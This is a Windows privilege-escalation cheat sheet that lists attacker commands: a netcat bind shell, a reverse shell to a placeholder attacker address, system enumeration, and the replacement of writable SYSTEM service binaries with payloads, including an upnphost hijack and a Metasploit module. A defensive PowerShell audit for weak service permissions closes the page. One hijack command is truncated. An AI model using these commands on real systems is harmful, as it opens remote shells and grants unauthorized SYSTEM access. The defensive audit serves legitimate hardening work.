Meterpreter exploit suggester
Windows elevation of privileges

ToC
EoP 1: Incorrect permissions in services
EoP 3: ClearText passwords (quick hits)
EoP 5: Services only available from loopback

Getting a shell in limited interpreters:
$ system("start cmd.exe /k $cmd")

Bind cmd to a port:
$ nc.exe -Lp 31337 -vv -e cmd.exe

Reverse shell:
$ nc.exe attacker_ip attacker_port -e cmd.exe

EoP 0: System info

Finding installed software, running processes, bound ports and the OS version is often critical to identifying the right EoP vector.

Find installed patches, architecture, OS version:
$ systeminfo

Find current user

Get exact OS version:
$ type C:/Windows/system32/eula.txt

Information about a user:
$ net users Administrator

Firewall information:
$ netsh firewall show state

Network information:
$ ipconfig /all & route print & arp -a

List scheduled tasks:
$ schtasks /query /fo LIST /v

List Windows services:
$ net start
$ wmic service list brief
$ tasklist /SVC

EoP 1: Incorrect permissions in services

A service running as Administrator/SYSTEM whose binary has incorrect file permissions might allow EoP: you can replace the binary, restart the service and get SYSTEM.

Common exploitation payloads involve replacing the affected binary with a reverse shell, or with a command that creates a new user and adds it to the Administrators group.

We are interested in services where the permissions on the binary grant BUILTIN\Users (F), (C) or (M), that is full, change or modify access for our group.

The following commands print the affected services. The first loop collects the path of every service binary outside system32 into a file (one path per line, appended rather than overwritten); the second runs icacls on each collected path:
$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

If wmic is not available, we can use sc.exe. The loops below extract every service name, then query each service for its BINARY_PATH_NAME and append the result to path.txt:
$ sc query state= all | findstr "SERVICE_NAME:" > Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

You can also manually check each service using cacls:
$ cacls "C:\path\to\file.exe"

Replace the affected binary with your payload and restart the service:
$ wmic service NAMEOFSERVICE call startservice
$ net stop serviceName & net start serviceName
$ sc start/stop serviceName

Windows XP SP1 is known to be vulnerable to EoP in upnphost.

You get Administrator with:
$ sc config upnphost binpath= "C:\Inetpub\
$ sc config upnphost obj= ".\LocalSystem" password= ""

If it fails because of a missing dependency, run the following:
$ sc config SSDPSRV start= auto

Or remove the dependency:
$ sc config upnphost depend= ""

Using meterpreter:
> exploit/windows/local/service_permissions

If you don't have access to wmic, you can do:
$ sc qc upnphost

If neither wmic nor sc is available, you can use accesschk. For Windows XP, version 5.2 of accesschk is needed:
$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
$ accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula

Then query the service using Windows sc:
$ sc qc <service name>
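The per-service permission checks in EoP 1 (icacls or accesschk on each service binary) are the same check a defender runs to find services that need their ACLs tightened before anyone else finds them. The PowerShell below is an added example written for this page, not code from the original cheat sheet; it assumes an elevated prompt (so every service path and ACL is readable) and treats BUILTIN\Users, Authenticated Users, Everyone and INTERACTIVE as the low-privilege principals of interest, which is my choice rather than the page's. It goes slightly beyond the page's loop by also checking the directory that holds each binary, since a writable directory lets the file be replaced just as surely as a writable file.

```powershell
# Added example (not from the original page): audit Windows services whose
# binary, or the directory holding it, grants write-class rights to a
# low-privilege principal. These are the "EoP 1" services above: a
# SYSTEM/Administrator service that any local user could swap out.
# Run from an elevated PowerShell prompt.

# Principals that should never be able to modify a service binary (assumed list).
$LowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these specific rights lets the holder replace or alter the file.
$WriteClassRights = [int][System.Security.AccessControl.FileSystemRights]'Modify, FullControl, Write, WriteData, ChangePermissions, TakeOwnership'
# Some ACEs carry generic rights instead, which show up as raw bits:
# GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000).
$GenericWriteBits = 0x40000000 -bor 0x10000000

function Get-ServiceExecutablePath {
    param([string]$PathName)
    # PathName is the raw image path, e.g.
    #   "C:\Program Files\Foo\svc.exe" -arg      or
    #   C:\Windows\system32\svchost.exe -k netsvcs
    # Return just the executable, without arguments.
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { return $p.Substring(1, $end - 1) }
        return $p.Trim('"')
    }
    # Unquoted: cut at the first ".exe" so spaces inside the path survive.
    $m = [regex]::Match($p, '^(.+?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($p -split '\s+')[0]
}

function Get-WeakAces {
    param([string]$Path)
    # Return the Allow ACEs on $Path that give write-class rights to a
    # low-privilege principal. Unreadable paths yield nothing.
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    $acl.Access | Where-Object {
        $rights = [int]$_.FileSystemRights
        $_.AccessControlType -eq 'Allow' -and
        ($LowPrivPrincipals -contains $_.IdentityReference.Value) -and
        ((($rights -band $WriteClassRights) -ne 0) -or (($rights -band $GenericWriteBits) -ne 0))
    }
}

# One finding per (service, target path, offending ACE).
$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $exe = Get-ServiceExecutablePath $svc.PathName
    if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
    $dir = Split-Path -Parent $exe
    foreach ($target in @($exe, $dir)) {
        foreach ($ace in Get-WeakAces $target) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                Target    = $target
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

if ($findings) {
    $findings | Sort-Object Service, Target | Format-Table -AutoSize
} else {
    'No service binaries or directories are writable by low-privilege principals.'
}
```

On a correctly configured host the output is empty. Each row that does appear corresponds to what the page's icacls loop would show as BUILTIN\Users with (F), (C) or (M); the RunsAs and StartMode columns tell you whether the service runs as LocalSystem and starts automatically, which is what makes the finding worth fixing first. Remediation is to remove the offending grant (for example `icacls "<path>" /remove:g "BUILTIN\Users"` on the reported target) and re-run the audit.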